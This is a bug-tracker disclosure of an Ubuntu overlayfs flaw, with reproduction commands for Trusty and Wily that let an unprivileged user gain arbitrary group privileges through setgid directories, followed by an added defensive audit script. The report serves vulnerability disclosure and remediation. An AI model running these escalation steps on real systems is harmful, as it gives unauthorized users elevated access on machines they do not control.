Comment 0 for bug 1534961

halfdog (halfdog) wrote : insecure overlayfs xattrs handling in copy_up

On Ubuntu Trusty and also on Ubuntu Wily, the following sequence allows gaining group privileges of arbitrary groups that created directories with the properties found using "find / -perm -02020", e.g.:

/usr/local/lib/python3.4 root.staff
/var/lib/libuuid libuuid.libuuid
/var/local root.staff
/var/mail root.mail

For Ubuntu Trusty, the following sequence can be used to reproduce the problem:

* In user/mount namespace:

rm -rf Mnt Test
mkdir Mnt Test
mount -t overlayfs -o lowerdir=/var,upperdir=Test overlayfs Mnt

* Outside namespace:

setfacl -m d:u:[your unpriv uid]:rwx Test

* Inside:

chmod 02777 Mnt/mail
umount Mnt

* Outside:

~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd

For Ubuntu Wily:

* Inside:

mkdir Mnt Test Work
mount -t overlayfs -o lowerdir=/var,upperdir=Test,workdir=Work overlayfs Mnt

* Outside:

setfacl -m d:u::rwx,d:u:[your unpriv uid]:rwx Work/work

* Inside:

chmod 02777 Mnt/mail
umount Mnt

* Outside:

~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd

CreateSetgidBinary is from http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
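
For administrators checking their exposure, the following is an added example and not part of the original report: it lists the directories matched by the report's "find / -perm -02020" test in the same owner.group form, and separately flags any that are also world-writable, which is the mode (02777) the chmod step above leaves on the copied-up directory. The function name audit_setgid_dirs is hypothetical, and GNU find and stat are assumed.

```shell
#!/bin/sh
# Added example (not from the bug report): audit setgid, group-writable
# directories, i.e. the property the report selects with "-perm -02020".
#
# audit_setgid_dirs ROOT
#   Prints one line per matching directory under ROOT:
#     GROUP-WRITABLE <octal mode> <owner>.<group> <path>
#     WORLD-WRITABLE <octal mode> <owner>.<group> <path>
#   WORLD-WRITABLE marks directories that anyone can write into while new
#   files still inherit the directory's group; review these first.
#   Assumes GNU find/stat; paths containing newlines are not handled.
audit_setgid_dirs() {
    root=${1:-/}
    # -xdev keeps the walk on one filesystem (skips /proc, /sys, other
    # mounts); call the function once per filesystem of interest.
    find "$root" -xdev -type d -perm -02020 \
         -exec stat -c '%a %U.%G %n' {} + 2>/dev/null |
    while read -r mode owner path; do
        case $mode in
            # Last octal digit 2, 3, 6 or 7 means the "other" write bit is set.
            *[2367]) echo "WORLD-WRITABLE $mode $owner $path" ;;
            *)       echo "GROUP-WRITABLE $mode $owner $path" ;;
        esac
    done
}

# Run against the filesystem root when executed directly with arguments,
# e.g.:  sh audit.sh /var
if [ "$#" -gt 0 ]; then
    for r in "$@"; do
        audit_setgid_dirs "$r"
    done
fi
```

GROUP-WRITABLE entries such as /var/mail are expected on a stock system; a WORLD-WRITABLE entry owned by a system group, especially inside a user-controlled directory, is what deserves investigation.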